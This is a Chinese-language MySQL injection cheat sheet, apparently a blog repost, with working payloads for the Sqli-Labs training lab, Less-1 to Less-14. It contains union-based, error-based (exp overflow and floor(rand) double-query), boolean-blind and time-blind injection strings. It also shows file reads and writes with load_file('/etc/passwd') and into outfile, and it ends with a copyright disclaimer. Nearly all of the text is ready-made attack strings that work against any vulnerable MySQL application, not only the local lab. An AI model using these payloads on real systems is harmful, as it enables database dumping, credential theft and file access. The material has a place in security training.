Mysql注入备忘
mysql注入中常用到的函数
database()查询当前数据库
current_user()查询当前用户
@@datadir查询数据库路径
@@version_compile_os查询操作系统版本
version()查询数据库版本
concat_ws(separator,str1, str2)含有分割符连接字符串
concat_ws(0x3a, version(), user(), database())
group_concat()含有分割符连接字段
group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [Separator ‘分隔符‘])
group_concat(distinct table_schema)
mysql注释符
#, -- , /* */, 注意--的后面还有一个空格
mysql的又一种报错注入
select * from users where username=‘admin‘ and exp(~(select*from (select user())a)); -- output ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost‘ from dual)))‘
Less-1实例
http://127.0.0.1/sqli/Less-1/?id=1‘ and exp(~(select*from(select user())a)) --+ -- output DOUBLE value is out of range in ‘exp(~((select ‘root@localhost‘ from dual)))‘
常规报错注入
and 0 union select 1, group_concat(distinct table_schema), 3 from information_schema.columns --+ 爆库 and 0 union select 1, group_concat(distinct table_name), 3 from information_schema.columns where table_schema = 要爆库名的hex --+ and 0 union select 1, group_concat(distinct column_name), 3 from information_schema.columns where table_name = 要爆表名的hex --+ and 0 union select 1, group_concat(column1, 0x3a, column2), 3 from table_name --+
Sqli-Labs
Less-1 字符型
http://127.0.0.1/sqli/Less-1/?id=1‘ and all union select 1,2,3 --+
Less-2 数字型
http://127.0.0.1/sqli/Less-2/?id=1 and all union select 1,2,3 --+
Less-3/4 字符型,有括号,3和4只是单引号和双引号问题。
-- 关键代码 -- Less-3 $sql="SELECT * FROM users WHERE id=(‘$id‘) LIMIT 0,1"; -- ‘)闭合括号和单引号即可 http://127.0.0.1/sqli/Less-3/?id=-1‘) union all select 1,2,3--+
双查询注入
有时候并不会返回错误,需要多刷几次
select concat(0x3a,0x3a,(select version()), 0x3a,0x3a); -- ::10.0.13-MariaDB:: select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2)); -- ::10.0.13-MariaDB::1/0 select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from security.users; -- 表中有多少列就显示出多少条::10.0.13-MariaDB::1/0 select concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a; -- ::10.0.13-MariaDB::1 -- ::10.0.13-MariaDB::0 select count(*), concat(0x3a,0x3a,(select version()), 0x3a,0x3a, floor(rand(0)*2))a from information_schema.tables group by a; -- ERROR 1062 (23000): Duplicate entry ‘::10.0.13-MariaDB::1‘ for key ‘group_key‘ -- 模式 union select 字段数 from (select count(*), concat(0x3a,0x3a,(查询语句),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+
Less-5/6
-- Less-5 http://127.0.0.1/sqli/Less-5/?id=1‘ union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+
-- Less-6 http://127.0.0.1/sqli/Less-6/?id=1" union select 1,2,3 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b --+
Load_file && into outfile && dumpfile
select * from emails into outfile "/tmp/test.txt"; select * from emails limit 0,1 into dumpfile "test1.txt"; select load_file("/etc/passwd");
Less-7
http://127.0.0.1/sqli/Less-7/?id=1‘)) union select 1,2,version() into outfile "/srv/www/htdocs/sqli/Less-7/test11.txt"--+
Less-8 布尔型盲注
http://127.0.0.1/sqli/Less-8/?id=1‘ and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 1))) =101--+
Less-9/10 基于时间的盲注
在mysql中一般是用sleep()函数将查询暂停数秒,对于没有sleep()的可以用benchmark()函数。
一般模式,配合ascii,substr,和if语句来查询:
‘ union select if(ascii(substr((查询语句),i,1)) > k, sleep(10), null) --+ ‘ and if((select substr((查询语句), i, 1))=‘xxx‘, sleep(10), null) --+ -- Less-9 ‘ and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=‘e‘, sleep(5), null) --+ -- Less-10 " and IF((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0,1)=‘e‘, sleep(5), null) --+
Less-11/12 有回显的POST注入,和Less-1/2差不多。
-- POST的数据 -- Less-11 uname=1&passwd=1‘ union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() # -- Less-12 uname=1&passwd=1") union select 1,group_concat(distinct table_name) from information_schema.tables where table_schema=database() #
Less-13/14 POST双查询注入
-- Less-13 uname=1&passwd=1‘) union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #
-- Less-14 uname=1&passwd=1" union select 1,2 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b #
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。